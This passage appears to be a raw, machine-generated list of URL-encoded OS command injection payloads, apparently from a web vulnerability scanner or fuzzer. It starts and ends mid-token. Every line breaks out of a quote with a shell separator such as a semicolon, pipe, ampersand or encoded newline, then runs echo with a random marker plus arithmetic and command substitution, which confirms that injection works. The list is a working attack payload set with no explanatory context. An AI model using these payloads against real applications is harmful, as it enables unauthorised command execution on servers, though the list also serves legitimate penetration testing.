((33%2B58))$(echo%20ETYFQP)ETYFQP&\n%27echo%20MEZJPT$((67%2B11))$(echo%20MEZJPT)MEZJPT|\n%27%20echo%20DOXQVC$((74%2B61))$(echo%20DOXQVC)DOXQVC|\n%27;echo%20WAGVJJ$((84%2B94))$(echo%20WAGVJJ)WAGVJJ|\n%27&echo%20YUMWMH$((91%2B2))$(echo%20YUMWMH)YUMWMH|\n%27|echo%20VLQXSQ$((5%2B5))$(echo%20VLQXSQ)VLQXSQ|\n%27||echo%20ZSDIEW$((96%2B12))$(echo%20ZSDIEW)ZSDIEW|\n%27&&echo%20MWTYAC$((26%2B86))$(echo%20MWTYAC)MWTYAC|\n%27%0aecho%20FXJFMZ$((67%2B82))$(echo%20FXJFMZ)FXJFMZ|\n%27%3Becho%20HYRAZO$((93%2B48))$(echo%20HYRAZO)HYRAZO|\n%27%26echo%20QVAOWT$((0%2B68))$(echo%20QVAOWT)QVAOWT|\n%27%26%26echo%20MEJTEK$((75%2B29))$(echo%20MEJTEK)MEJTEK|\n%27%7Cecho%20PTVJZR$((87%2B16))$(echo%20PTVJZR)PTVJZR|\n%27%7C%7Cecho%20ZXDFVL$((67%2B12))$(echo%20ZXDFVL)ZXDFVL|\n%27echo%20RGSQNO$((48%2B30))$(echo%20RGSQNO)RGSQNO%27\n%27%20echo%20DHRZFK$((82%2B16))$(echo%20DHRZFK)DHRZFK%27\n%27;echo%20MCJMIQ$((92%2B3))$(echo%20MCJMIQ)MCJMIQ%27\n%27&echo%20BQAOON$((14%2B21))$(echo%20BQAOON)BQAOON%27\n%27|echo%20QIQGXS$((79%2B42))$(echo%20QIQGXS)QIQGXS%27\n%27||echo%20XUDLIK$((35%2B13))$(echo%20XUDLIK)XUDLIK%27\n%27&&echo%20CDEUKI$((43%2B31))$(echo%20CDEUKI)CDEUKI%27\n%27%0aecho%20SDDGTU$((60%2B67))$(echo%20SDDGTU)SDDGTU%27\n%27%3Becho%20ZDXLMM$((81%2B23))$(echo%20ZDXLMM)ZDXLMM%27\n%27%26echo%20ZAXLWL$((53%2B15))$(echo%20ZAXLWL)ZAXLWL%27\n%27%26%26echo%20VYRMIL$((42%2B66))$(echo%20VYRMIL)VYRMIL%27\n%27%7Cecho%20CNIXGW$((42%2B54))$(echo%20CNIXGW)CNIXGW%27\n%27%7C%7Cecho%20PJQWDG$((53%2B4))$(echo%20PJQWDG)PJQWDG%27\n%27echo%20WMKULY$((97%2B40))$(echo%20WMKULY)WMKULY%22\n%27%20echo%20VJRMHC$((3%2B22))$(echo%20VJRMHC)VJRMHC%22\n%27;echo%20RKVIFI$((60%2B48))$(echo%20RKVIFI)RKVIFI%22\n%27&echo%20OLOQKQ$((39%2B2))$(echo%20OLOQKQ)OLOQKQ%22\n%27|echo%20RBWMSW$((98%2B45))$(echo%20RBWMSW)RBWMSW%22\n%27||echo%20NFTXSR$((84%2B40))$(echo%20NFTXSR)NFTXSR%22\n%27&&echo%20ICNFZX$((85%2B34))$(echo%20ICNFZX)ICNFZX%22\n%27%0aecho%20SXQQOX$((93%2B26))$(echo%20SXQQOX)SXQQOX%22\n%27%3Becho%20QQXBDZ$((99%2B24))$(echo%20QQXBDZ)QQXBDZ%22\n%27%26echo%20XZUUTF$((78%2B20))$(echo%20XZUUTF)XZUUTF%22\n%27%26%26echo%20DJDLKS$((28%2B16))$(echo%20DJDLKS)DJDLKS%22\n%27%7Cecho%20RMTAEV$((79%2B76))$(echo%20RMTAEV)RMTAEV%22\n%27%7C%7Cecho%20BRLUWI$((24%2B78))$(echo%20BRLUWI)BRLUWI%22\n%27echo%20HMZWLY$((77%2B96))$(echo%20HMZWLY)HMZWLY%5C%5C\n%27%20echo%20DBCEVA$((9%2B19))$(echo%20DBCEVA)DBCEVA%5C%5C\n%27;echo%20QDZRDC$((54%2B73))$(echo%20QDZRDC)QDZRDC%5C%5C\n%27&echo%20SCIQBL$((85%2B51))$(echo%20SCIQBL)SCIQBL%5C%5C\n%27|echo%20PRMMPK$((67%2B45))$(echo%20PRMMPK)PRMMPK%5C%5C\n%27||echo%20WQKJHL$((97%2B29))$(echo%20WQKJHL)WQKJHL%5C%5C\n%27&&echo%20FBQVWJ$((2%2B58))$(echo%20FBQVWJ)FBQVWJ%5C%5C\n%27%0aecho%20SUTPRJ$((93%2B86))$(echo%20SUTPRJ)SUTPRJ%5C%5C\n%27%3Becho%20IKGCWR$((71%2B55))$(echo%20IKGCWR)IKGCWR%5C%5C\n%27%26echo%20RLARCW$((64%2B37))$(echo%20RLARCW)RLARCW%5C%5C\n%27%26%26echo%20FIDBBA$((41%2B96))$(echo%20FIDBBA)FIDBBA%5C%5C\n%27%7Cecho%20OWEWCR$((30%2B3))$(echo%20OWEWCR)OWEWCR%5C%5C\n%27%7C%7Cecho%20JUQYUK$((27%2B47))$(echo%20JUQYUK)JUQYUK%5C%5C\n%27echo%20YLNBVA$((75%2B72))$(echo%20YLNBVA)YLNBVA%2F%2F\n%27%20echo%20DWDUKP$((90%2B61))$(echo%20DWDUKP)DWDUKP%2F%2F\n%27;echo%20RWVNGG$((78%2B53))$(echo%20RWVNGG)RWVNGG%2F%2F\n%27&echo%20VSBIXB$((26%2B99))$(echo%20VSBIXB)VSBIXB%2F%2F\n%27|echo%20EBNPAG$((16%2B53))$(echo%20EBNPAG)EBNPAG%2F%2F\n%27||echo%20VDIYTJ$((0%2B65))$(echo%20VDIYTJ)VDIYTJ%2F%2F\n%27&&echo%20NLWQZV$((48%2B73))$(echo%20NLWQZV)NLWQZV%2F%2F\n%27%0aecho%20NZXQYS$((60%2B28))$(echo%20NZXQYS)NZXQYS%2F%2F\n%27%3Becho%20DRGCTI$((40%2B71))$(echo%20DRGCTI)DRGCTI%2F%2F\n%27%26echo%20YQPXBQ$((33%2B15))$(echo%20YQPXBQ)YQPXBQ%2F%2F\n%27%26%26echo%20KBSBEA$((42%2B79))$(echo%20KBSBEA)KBSBEA%2F%2F\n%27%7Cecho%20ENACLF$((45%2B12))$(echo%20ENACLF)ENACLF%2F%2F\n%27%7C%7Cecho%20QZICOQ$((45%2B93))$(echo%20QZICOQ)QZICOQ%2F%2F\n%27echo%20RQZWBL$((44%2B68))$(echo%20RQZWBL)RQZWBL%26\n%27%20echo%20PQOBOJ$((4%2B75))$(echo%20PQOBOJ)PQOBOJ%26\n%27;echo%20ZPHRKV$((85%2B32))$(echo%20ZPHRKV)ZPHRKV%26\n%27&echo%20PLTXSN$((86%2B55))$(echo%20PLTXSN)PLTXSN%26\n%27|echo%20XLWNAZ$((67%2B28))$(echo%20XLWNAZ)XLWNAZ%26\n%27||echo%20NCRWHM$((61%2B27))$(echo%20NCRWHM)NCRWHM%26\n%27&&echo%20VNSCPP$((62%2B21))$(echo%20VNSCPP)VNSCPP%26\n%27%0aecho%20OUPQQD$((2%2B0))$(echo%20OUPQQD)OUPQQD%26\n%27%3Becho%20GAJFQI$((99%2B73))$(echo%20GAJFQI)GAJFQI%26\n%27%26echo%20TQUBCH$((14%2B97))$(echo%20TQUBCH)TQUBCH%26\n%27%26%26echo%20RPLSNW$((41%2B19))$(echo%20RPLSNW)RPLSNW%26\n%27%7Cecho%20OYOVQI$((33%2B96))$(echo%20OYOVQI)OYOVQI%26\n%27%7C%7Cecho%20IYHEBU$((64%2B26))$(echo%20IYHEBU)IYHEBU%26\n%27echo%20KPNQGS$((46%2B86))$(echo%20KPNQGS)KPNQGS%7C\n%27%20echo%20WDKUFJ$((39%2B52))$(echo%20WDKUFJ)WDKUFJ%7C\n%27;echo%20GFACXP$((32%2B46))$(echo%20GFACXP)GFACXP%7C\n%27&echo%20NCNRPJ$((94%2B40))$(echo%20NCNRPJ)NCNRPJ%7C\n%27|echo%20KBYQUW$((20%2B94))$(echo%20KBYQUW)KBYQUW%7C\n%27||echo%20QQHXIW$((77%2B85))$(echo%20QQHXIW)QQHXIW%7C\n%27&&echo%20EFAUWG$((53%2B25))$(echo%20EFAUWG)EFAUWG%7C\n%27%0aecho%20UDKFRM$((88%2B90))$(echo%20UDKFRM)UDKFRM%7C\n%27%3Becho%20HWICQB$((1%2B54))$(echo%20HWICQB)HWICQB%7C\n%27%26echo%20VFLICS$((40%2B73))$(echo%20VFLICS)VFLICS%7C\n%27%26%26echo%20VRMOKO$((94%2B14))$(echo%20VRMOKO)VRMOKO%7C\n%27%7Cecho%20TRCDFT$((10%2B45))$(echo%20TRCDFT)TRCDFT%7C\n%27%7C%7Cecho%20CSRAQS$((36%2B11))$(echo%20CSRAQS)CSRAQS%7C\n%22echo%20QDLIQI$((19%2B0))$(echo%20QDLIQI)QDLIQI\n%22%20echo%20UUGDBS$((24%2B48))$(echo%20UUGDBS)UUGDBS\n%22;echo%20TOQHQO$((39%2B33))$(echo%20TOQHQO)TOQHQO\n%22&echo%20RXWHBL$((29%2B57))$(echo%20RXWHBL)RXWHBL\n%22|echo%20WXWDDM$((64%2B94))$(echo%20WXWDDM)WXWDDM\n%22||echo%20FICECR$((56%2B81))$(echo%20FICECR)FICECR\n%22&&echo%20JFXAMU$((71%2B94))$(echo%20JFXAMU)JFXAMU\n%22%0aecho%20KVHIKT$((53%2B91))$(echo%20KVHIKT)KVHIKT\n%22%3Becho%20EPABXR$((84%2B49))$(echo%20EPABXR)EPABXR\n%22%26echo%20KVAPYG$((73%2B0))$(echo%20KVAPYG)KVAPYG\n%22%26%26echo%20BCDGJZ$((39%2B25))$(echo%20BCDGJZ)BCDGJZ\n%22%7Cecho%20ASWJBG$((45%2B44))$(echo%20ASWJBG)ASWJBG\n%22%7C%7Cecho%20TELPMA$((31%2B37))$(echo%20TELPMA)TELPMA\n%22echo%20AHKWJA$((95%2B73))$(echo%20AHKWJA)AHKWJA'\n%22%20echo%20UKACTN$((51%2B30))$(echo%20UKACTN)UKACTN'\n%22;echo%20NGVTGX$((65%2B7))$(echo%20NGVTGX)NGVTGX'\n%22&echo%20XGFFNI$((27%2B72))$(echo%20XGFFNI)XGFFNI'\n%22|echo%20ZSRBDN$((11%2B21))$(echo%20ZSRBDN)ZSRBDN'\n%22||echo%20ASRSJE$((90%2B76))$(echo%20ASRSJE)ASRSJE'\n%22&&echo%20RTDEYI$((53%2B46))$(echo%20RTDEYI)RTDEYI'\n%22%0aecho%20FPJHYX$((59%2B74))$(echo%20FPJHYX)FPJHYX'\n%22%3Becho%20MFPJMQ$((82%2B20))$(echo%20MFPJMQ)MFPJMQ'\n%22%26echo%20AIBILK$((43%2B3))$(echo%20AIBILK)AIBILK'\n%22%26%26echo%20WHIDLL$((79%2B18))$(echo%20WHIDLL)WHIDLL'\n%22%7Cecho%20ZKFRXV$((90%2B79))$(echo%20ZKFRXV)ZKFRXV'\n%22%7C%7Cecho%20GRQVVJ$((32%2B82))$(echo%20GRQVVJ)GRQVVJ'\n%22echo%20HVUQLV$((68%2B45))$(echo%20HVUQLV)HVUQLV\"\n%22%20echo%20PPHMUH$((17%2B73))$(echo%20PPHMUH)PPHMUH\"\n%22;echo%20SQMNBY$((85%2B74))$(echo%20SQMNBY)SQMNBY\"\n%22&echo%20GVQEOC$((57%2B36))$(echo%20GVQEOC)GVQEOC\"\n%22|echo%20KIYTJL$((54%2B29))$(echo%20KIYTJL)KIYTJL\"\n%22||echo%20SYCJEC$((69%2B95))$(echo%20SYCJEC)SYCJEC\"\n%22&&echo%20EIUCDV$((83%2B99))$(echo%20EIUCDV)EIUCDV\"\n%22%0aecho%20VFLNZS$((29%2B83))$(echo%20VFLNZS)VFLNZS\"\n%22%3Becho%20YEWKQB$((93%2B41))$(echo%20YEWKQB)YEWKQB\"\n%22%26echo%20LYAPEI$((34%2B37))$(echo%20LYAPEI)LYAPEI\"\n%22%26%26echo%20YPGEMK$((56%2B16))$(echo%20YPGEMK)YPGEMK\"\n%22%7Cecho%20FBMNPV$((56%2B92))$(echo%20FBMNPV)FBMNPV\"\n%22%7C%7Cecho%20OBONRE$((91%2B98))$(echo%20OBONRE)OBONRE\"\n%22echo%20FGEIMA$((19%2B87))$(echo%20FGEIMA)FGEIMA\n%22%20echo%20ZNMUAG$((46%2B92))$(echo%20ZNMUAG)ZNMUAG\n%22;echo%20GSRLST$((57%2B23))$(echo%20GSRLST)GSRLST\n%22&echo%20IRYPDI$((16%2B41))$(echo%20IRYPDI)IRYPDI\n%22|echo%20OJFSCA$((98%2B19))$(echo%20OJFSCA)OJFSCA\n%22||echo%20BQPBUE$((6%2B80))$(echo%20BQPBUE)BQPBUE\n%22&&echo%20MEFVSC$((80%2B28))$(echo%20MEFVSC)MEFVSC\n%22%0aecho%20SMCVFB$((37%2B17))$(echo%20SMCVFB)SMCVFB\n%22%3Becho%20ZRKJES$((88%2B77))$(echo%20ZRKJES)ZRKJES\n%22%26echo%20OJNZQH$((38%2B58))$(echo%20OJNZQH)OJNZQH\n%22%26%26echo%20RKEIHR$((8%2B8))$(echo%20RKEIHR)RKEIHR\n%22%7Cecho%20YMPBBD$((78%2B0))$(echo%20YMPBBD)YMPBBD\n%22%7C%7Cecho%20VYQXWF$((1%2B91))$(echo%20VYQXWF)VYQXWF\n%22echo%20KWRCTG$((97%2B95))$(echo%20KWRCTG)KWRCTG//\n%22%20echo%20QUEVJY$((66%2B5))$(echo%20QUEVJY)QUEVJY//\n%22;echo%20HBUSJP$((41%2B2))$(echo%20HBUSJP)HBUSJP//\n%22&echo%20VZHJIZ$((31%2B26))$(echo%20VZHJIZ)VZHJIZ//\n%22|echo%20KASCNP$((90%2B75))$(echo%20KASCNP)KASCNP//\n%22||echo%20PLTNLH$((0%2B63))$(echo%20PLTNLH)PLTNLH//\n%22&&echo%20ZNVIVL$((97%2B19))$(echo%20ZNVIVL)ZNVIVL//\n%22%0aecho%20UCUIPY$((4%2B10))$(echo%20UCUIPY)UCUIPY//\n%22%3Becho%20BQSCFC$((0%2B98))$(echo%20BQSCFC)BQSCFC//\n%22%26echo%20NCSCZB$((35%2B52))$(echo%20NCSCZB)NCSCZB//\n%22%26%26echo%20FRTWQZ$((70%2B78))$(echo%20FRTWQZ)FRTWQZ//\n%22%7Cecho%20WWSFKA$((8%2B52))$(echo%20WWSFKA)WWSFKA//\n%22%7C%7Cecho%20NDQNYQ$((36%2B54))$(echo%20NDQNYQ)NDQNYQ//\n%22echo%20DGHRDE$((18%2B48))$(echo%20DGHRDE)DGHRDE\\\n%22%20echo%20MVAZCZ$((73%2B52))$(echo%20MVAZCZ)MVAZCZ\\\n%22;echo%20GWGFGD$((21%2B81))$(echo%20GWGFGD)GWGFGD\\\n%22&echo%20ZYOSSF$((3%2B73))$(echo%20ZYOSSF)ZYOSSF\\\n%22|echo%20FBXOQL$((67%2B71))$(echo%20FBXOQL)FBXOQL\\\n%22||echo%20UAVXQP$((39%2B92))$(echo%20UAVXQP)UAVXQP\\\n%22&&echo%20LJHQDJ$((6%2B56))$(echo%20LJHQDJ)LJHQDJ\\\n%22%0aecho%20UNYMSO$((48%2B29))$(echo%20UNYMSO)UNYMSO\\\n%22%3Becho%20IRKBUP$((99%2B87))$(echo%20IRKBUP)IRKBUP\\\n%22%26echo%20NFZBSQ$((53%2B70))$(echo%20NFZBSQ)NFZBSQ\\\n%22%26%26echo%20JRKOKH$((41%2B85))$(echo%20JRKOKH)JRKOKH\\\n%22%7Cecho%20GVEWSC$((69%2B53))$(echo%20GVEWSC)GVEWSC\\\n%22%7C%7Cecho%20HUGKZQ$((0%2B67))$(echo%20HUGKZQ)HUGKZQ\\\n%22echo%20XVGLRE$((21%2B97))$(echo%20XVGLRE)XVGLRE&\n%22%20echo%20NQIVYI$((0%2B58))$(echo%20NQIVYI)NQIVYI&\n%22;echo%20CJTVBA$((23%2B42))$(echo%20CJTVBA)CJTVBA&\n%22&echo%20CDFCWV$((36%2B22))$(echo%20CDFCWV)CDFCWV&\n%22|echo%20LAHTXU$((26%2B18))$(echo%20LAHTXU)LAHTXU&\n%22||echo%20FUOMJK$((92%2B23))$(echo%20FUOMJK)FUOMJK&\n%22&&echo%20RVDTRJ$((31%2B86))$(echo%20RVDTRJ)RVDTRJ&\n%22%0aecho%20TKPCMK$((80%2B65))$(echo%20TKPCMK)TKPCMK&\n%22%3Becho%20IAFRMU$((45%2B79))$(echo%20IAFRMU)IAFRMU&\n%22%26echo%20CFMBIF$((28%2B65))$(echo%20CFMBIF)CFMBIF&\n%22%26%26echo%20BXSPDI$((19%2B54))$(echo%20BXSPDI)BXSPDI&\n%22%7Cecho%20RVSWPE$((20%2B81))$(echo%20RVSWPE)RVSWPE&\n%22%7C%7Cecho%20FFTCDY$((19%2B95))$(echo%20FFTCDY)FFTCDY&\n%22echo%20WDCBUT$((15%2B76))$(echo%20WDCBUT)WDCBUT|\n%22%20echo%20VSICUH$((78%2B75))$(echo%20VSICUH)VSICUH|\n%22;echo%20YKMMSL$((26%2B29))$(echo%20YKMMSL)YKMMSL|\n%22&echo%20YJBRIM$((70%2B55))$(echo%20YJBRIM)YJBRIM|\n%22|echo%20SAQMPN$((71%2B20))$(echo%20SAQMPN)SAQMPN|\n%22||echo%20YWODEP$((80%2B41))$(echo%20YWODEP)YWODEP|\n%22&&echo%20JGZWWL$((44%2B20))$(echo%20JGZWWL)JGZWWL|\n%22%0aecho%20QMZUQP$((97%2B31))$(echo%20QMZUQP)QMZUQP|\n%22%3Becho%20MDLILU$((59%2B57))$(echo%20MDLILU)MDLILU|\n%22%26echo%20QDNJWL$((73%2B61))$(echo%20QDNJWL)QDNJWL|\n%22%26%26echo%20FNCMMT$((70%2B94))$(echo%20FNCMMT)FNCMMT|\n%22%7Cecho%20HJHZHR$((26%2B15))$(echo%20HJHZHR)HJHZHR|\n%22%7C%7Cecho%20CTPJOY$((58%2B42))$(echo%20CTPJOY)CTPJOY|\n%22echo%20COJKHQ$((57%2B48))$(echo%20COJKHQ)COJKHQ%27\n%22%20echo%20CMONNY$((1%2B69))$(echo%20CMONNY)CMONNY%27\n%22;echo%20IFLGNR$((31%2B89))$(echo%20IFLGNR)IFLGNR%27\n%22&echo%20CTSDYA$((54%2B8))$(echo%20CTSDYA)CTSDYA%27\n%22|echo%20TIADZA$((14%2B49))$(echo%20TIADZA)TIADZA%27\n%22||echo%20CMLPBA$((44%2B89))$(echo%20CMLPBA)CMLPBA%27\n%22&&echo%20QZUTVR$((14%2B14))$(echo%20QZUTVR)QZUTVR%27\n%22%0aecho%20SVPNNA$((78%2B23))$(echo%20SVPNNA)SVPNNA%27\n%22%3Becho%20DVBSPR$((73%2B13))$(echo%20DVBSPR)DVBSPR%27\n%22%26echo%20LLWODV$((74%2B52))$(echo%20LLWODV)LLWODV%27\n%22%26%26echo%20FXNWMX$((79%2B34))$(echo%20FXNWMX)FXNWMX%27\n%22%7Cecho%20LKRAYZ$((79%2B32))$(echo%20LKRAYZ)LKRAYZ%27\n%22%7C%7Cecho%20LPSQRE$((76%2B2))$(echo%20LPSQRE)LPSQRE%27\n%22echo%20HFMYLX$((51%2B18))$(echo%20HFMYLX)HFMYLX%22\n%22%20echo%20RCJQEC$((82%2B64))$(echo%20RCJQEC)RCJQEC%22\n%22;echo%20BEQETV$((73%2B10))$(echo%20BEQETV)BEQETV%22\n%22&echo%20IRSLRF$((35%2B88))$(echo%20IRSLRF)IRSLRF%22\n%22|echo%20IBSIQJ$((92%2B88))$(echo%20IBSIQJ)IBSIQJ%22\n%22||echo%20DORIYY$((30%2B85))$(echo%20DORIYY)DORIYY%22\n%22&&echo%20GJOLMS$((8%2B3))$(echo%20GJOLMS)GJOLMS%22\n%22%0aecho%20OSZJBG$((54%2B26))$(echo%20OSZJBG)OSZJBG%22\n%22%3Becho%20BPGUEU$((77%2B5))$(echo%20BPGUEU)BPGUEU%22\n%22%26echo%20VGMMDM$((58%2B64))$(echo%20VGMMDM)VGMMDM%22\n%22%26%26echo%20QYVLPC$((24%2B55))$(echo%20QYVLPC)QYVLPC%22\n%22%7Cecho%20EDEEZB$((20%2B80))$(echo%20EDEEZB)EDEEZB%22\n%22%7C%7Cecho%20UJQDXR$((25%2B32))$(echo%20UJQDXR)UJQDXR%22\n%22echo%20ZXCMSF$((31%2B27))$(echo%20ZXCMSF)ZXCMSF%5C%5C\n%22%20echo%20RWFBCU$((99%2B46))$(echo%20RWFBCU)RWFBCU%5C%5C\n%22;echo%20FUCJMY$((75%2B58))$(echo%20FUCJMY)FUCJMY%5C%5C\n%22&echo%20QWXPLL$((32%2B57))$(echo%20QWXPLL)QWXPLL%5C%5C\n%22|echo%20XZZPRW$((63%2B45))$(echo%20XZZPRW)XZZPRW%5C%5C\n%22||echo%20WMJGBT$((73%2B39))$(echo%20WMJGBT)WMJGBT%5C%5C\n%22&&echo%20IMYKBH$((59%2B74))$(echo%20IMYKBH)IMYKBH%5C%5C\n%22%0aecho%20QSSUKH$((35%2B92))$(echo%20QSSUKH)QSSUKH%5C%5C\n%22%3Becho%20LMRJYU$((40%2B49))$(echo%20LMRJYU)LMRJYU%5C%5C\n%22%26echo%20IFPLFI$((38%2B60))$(echo%20IFPLFI)IFPLFI%5C%5C\n%22%26%26echo%20DAEOVC$((76%2B21))$(echo%20DAEOVC)DAEOVC%5C%5C\n%22%7Cecho%20AITHIZ$((84%2B6))$(echo%20AITHIZ)AITHIZ%5C%5C\n%22%7C%7Cecho%20IVDYQE$((21%2B54))$(echo%20IVDYQE)IVDYQE%5C%5C\n%22echo%20HOFMJC$((68%2B53))$(echo%20HOFMJC)HOFMJC%2F%2F\n%22%20echo%20AXZBUQ$((26%2B11))$(echo%20AXZBUQ)AXZBUQ%2F%2F\n%22;echo%20JHIVSM$((44%2B64))$(echo%20JHIVSM)JHIVSM%2F%2F\n%22&echo%20OWORKI$((87%2B59))$(echo%20OWORKI)OWORKI%2F%2F\n%22|echo%20ANEUHZ$((23%2B22))$(echo%20ANEUHZ)ANEUHZ%2F%2F\n%22||echo%20XFBOCN$((61%2B25))$(echo%20XFBOCN)XFBOCN%2F%2F\n%22&&echo%20YRTLHO$((69%2B19))$(echo%20YRTLHO)YRTLHO%2F%2F\n%22%0aecho%20BAVEIJ$((9%2B64))$(echo%20BAVEIJ)BAVEIJ%2F%2F\n%22%3Becho%20PZXCGX$((34%2B78))$(echo%20PZXCGX)PZXCGX%2F%2F\n%22%26echo%20BLPHOB$((47%2B53))$(echo%20BLPHOB)BLPHOB%2F%2F\n%22%26%26echo%20MWFRFW$((14%2B54))$(echo%20MWFRFW)MWFRFW%2F%2F\n%22%7Cecho%20LKHTVK$((30%2B54))$(echo%20LKHTVK)LKHTVK%2F%2F\n%22%7C%7Cecho%20BGQCNZ$((2%2B66))$(echo%20BGQCNZ)BGQCNZ%2F%2F\n%22echo%20ESVBXV$((89%2B66))$(echo%20ESVBXV)ESVBXV%26\n%22%20echo%20BNDKEW$((39%2B20))$(echo%20BNDKEW)BNDKEW%26\n%22;echo%20BGIYOF$((34%2B50))$(echo%20BGIYOF)BGIYOF%26\n%22&echo%20XDIPPG$((33%2B59))$(echo%20XDIPPG)XDIPPG%26\n%22|echo%20AJPXDT$((8%2B89))$(echo%20AJPXDT)AJPXDT%26\n%22||echo%20JCPPUE$((34%2B90))$(echo%20JCPPUE)JCPPUE%26\n%22&&echo%20RFPQXJ$((16%2B75))$(echo%20RFPQXJ)RFPQXJ%26\n%22%0aecho%20MZNBQO$((65%2B66))$(echo%20MZNBQO)MZNBQO%26\n%22%3Becho%20EQXSGK$((86%2B0))$(echo%20EQXSGK)EQXSGK%26\n%22%26echo%20RWYPHC$((46%2B28))$(echo%20RWYPHC)RWYPHC%26\n%22%26%26echo%20YIKPNA$((95%2B99))$(echo%20YIKPNA)YIKPNA%26\n%22%7Cecho%20FNNAMY$((56%2B18))$(echo%20FNNAMY)FNNAMY%26\n%22%7C%7Cecho%20MNEBSX$((23%2B36))$(echo%20MNEBSX)MNEBSX%26\n%22echo%20DZXQHG$((20%2B46))$(echo%20DZXQHG)DZXQHG%7C\n%22%20echo%20GFNYXZ$((0%2B51))$(echo%20GFNYXZ)GFNYXZ%7C\n%22;echo%20TJENJF$((97%2B10))$(echo%20TJENJF)TJENJF%7C\n%22&echo%20JKZWSO$((16%2B99))$(echo%20JKZWSO)JKZWSO%7C\n%22|echo%20RZKEXB$((2%2B63))$(echo%20RZKEXB)RZKEXB%7C\n%22||echo%20EYSOOE$((50%2B13))$(echo%20EYSOOE)EYSOOE%7C\n%22&&echo%20KCTHKN$((54%2B70))$(echo%20KCTHKN)KCTHKN%7C\n%22%0aecho%20LGFSNB$((46%2B9))$(echo%20LGFSNB)LGFSNB%7C\n%22%3Becho%20VPPMSS$((65%2B3))$(echo%20VPPMSS)VPPMSS%7C\n%22%26echo%20DKZRJM$((95%2B2))$(echo%20DKZRJM)DKZRJM%7C\n%22%26%26echo%20AQMHPO$((37%2B73))$(echo%20AQMHPO)AQMHPO%7C\n%22%7Cecho%20SQSPCP$((36%2B68))$(echo%20SQSPCP)SQSPCP%7C\n%22%7C%7Cecho%20GJECAG$((89%2B5))$(echo%20GJECAG)GJECAG%7C\n%7Cecho%20SZVAMO$((82%2B22))$(echo%20SZVAMO)SZVAMO\n%7C%20echo%20QXCOXL$((27%2B5))$(echo%20QXCOXL)QXCOXL\n;echo%20JPGWRQ$((89%2B36))$(echo%20JPGWRQ)JPGWRQ\n&echo%20QPEVFY$((91%2B41))$(echo%20QPEVFY)QPEVFY\n|echo%20IXTPRS$((68%2B93))$(echo%20IXTPRS)IXTPRS\n||echo%20VEAONC$((56%2B45))$(echo%20VEAONC)VEAONC\n&&echo%20NWPTID$((80%2B31))$(echo%20NWPTID)NWPTID\n%0aecho%20YBTGCG$((1%2B43))$(echo%20YBTGCG)YBTGCG\n%3Becho%20BFFGMX$((91%2B86))$(echo%20BFFGMX)BFFGMX\n%26echo%20RYNLFM$((45%2B53))$(echo%20RYNLFM)RYNLFM\n%26%26echo%20HKCUQK$((13%2B67))$(echo%20HKCUQK)HKCUQK\n%7Cecho%20OSTCOG$((49%2B82))$(echo%20OSTCOG)OSTCOG\n%7C%7Cecho%20FZHCCB$((68%2B25))$(echo%20FZHCCB)FZHCCB\necho%20UZYQKP$((76%2B27))$(echo%20UZYQKP)UZYQKP'\n%20echo%20OMZNPF$((86%2B96))$(echo%20OMZNPF)OMZNPF'\n;echo%20YJRHBX$((4%2B25))$(echo%20YJRHBX)YJRHBX'\n&echo%20UDYYJG$((66%2B1))$(echo%20UDYYJG)UDYYJG'\n|echo%20LPZYWI$((40%2B14))$(echo%20LPZYWI)LPZYWI'\n||echo%20DFNHJP$((83%2B52))$(echo%20DFNHJP)DFNHJP'\n&&echo%20ANJDXN$((18%2B20))$(echo%20ANJDXN)ANJDXN'\n%0aecho%20RQUCHA$((6%2B94))$(echo%20RQUCHA)RQUCHA'\n%3Becho%20WJRNPH$((1%2B15))$(echo%20WJRNPH)WJRNPH'\n%26echo%20JUDEXC$((97%2B30))$(echo%20JUDEXC)JUDEXC'\n%26%26echo%20PGMBBO$((3%2B90))$(echo%20PGMBBO)PGMBBO'\n%7Cecho%20MIBCVM$((5%2B17))$(echo%20MIBCVM)MIBCVM'\n%7C%7Cecho%20TKWKEV$((96%2B49))$(echo%20TKWKEV)TKWKEV'\necho%20URWVVO$((0%2B4))$(echo%20URWVVO)URWVVO\"\n%20echo%20PVBSCV$((25%2B60))$(echo%20PVBSCV)PVBSCV\"\n;echo%20VBODDE$((78%2B21))$(echo%20VBODDE)VBODDE\"\n&echo%20TGYKVF$((42%2B14))$(echo%20TGYKVF)TGYKVF\"\n|echo%20IQBIEF$((77%2B16))$(echo%20IQBIEF)IQBIEF\"\n||echo%20THDZZM$((55%2B49))$(echo%20THDZZM)THDZZM\"\n&&echo%20AJIUPP$((67%2B66))$(echo%20AJIUPP)AJIUPP\"\n%0aecho%20SUTYKL$((12%2B33))$(echo%20SUTYKL)SUTYKL\"\n%3Becho%20YLZHIS$((5%2B69))$(echo%20YLZHIS)YLZHIS\"\n%26echo%20EDHTTZ$((57%2B39))$(echo%20EDHTTZ)EDHTTZ\"\n%26%26echo%20CLFOGI$((20%2B37))$(echo%20CLFOGI)CLFOGI\"\n%7Cecho%20CDHGHW$((46%2B6))$(echo%20CDHGHW)CDHGHW\"\n%7C%7Cecho%20DODCOD$((31%2B91))$(echo%20DODCOD)DODCOD\"\necho%20VKRABE$((6%2B96))$(echo%20VKRABE)VKRABE\n%20echo%20HLPASS$((48%2B61))$(echo%20HLPASS)HLPASS\n;echo%20KSVCNW$((0%2B53))$(echo%20KSVCNW)KSVCNW\n&echo%20YSZWVH$((93%2B51))$(echo%20YSZWVH)YSZWVH\n|echo%20DMMNWK$((14%2B86))$(echo%20DMMNWK)DMMNWK\n||echo%20RLINTX$((21%2B20))$(echo%20RLINTX)RLINTX\n&&echo%20JXFFUT$((67%2B52))$(echo%20JXFFUT)JXFFUT\n%0aecho%20XKMVBL$((16%2B26))$(echo%20XKMVBL)XKMVBL\n%3Becho%20JICGBW$((21%2B40))$(echo%20JICGBW)JICGBW\n%26echo%20XUKFFI$((79%2B7))$(echo%20XUKFFI)XUKFFI\n%26%26echo%20SXYROH$((80%2B44))$(echo%20SXYROH)SXYROH\n%7Cecho%20YZLKYH$((87%2B98))$(echo%20YZLKYH)YZLKYH\n%7C%7Cecho%20HRETTA$((56%2B9))$(echo%20HRETTA)HRETTA\necho%20UUKZPI$((71%2B35))$(echo%20UUKZPI)UUKZPI//\n%20echo%20UNSAJW$((40%2B12))$(echo%20UNSAJW)UNSAJW//\n;echo%20RDEQIN$((60%2B72))$(echo%20RDEQIN)RDEQIN//\n&echo%20KHEGEQ$((46%2B22))$(echo%20KHEGEQ)KHEGEQ//\n|echo%20LRPXWZ$((88%2B39))$(echo%20LRPXWZ)LRPXWZ//\n||echo%20ZSBSMD$((90%2B5))$(echo%20ZSBSMD)ZSB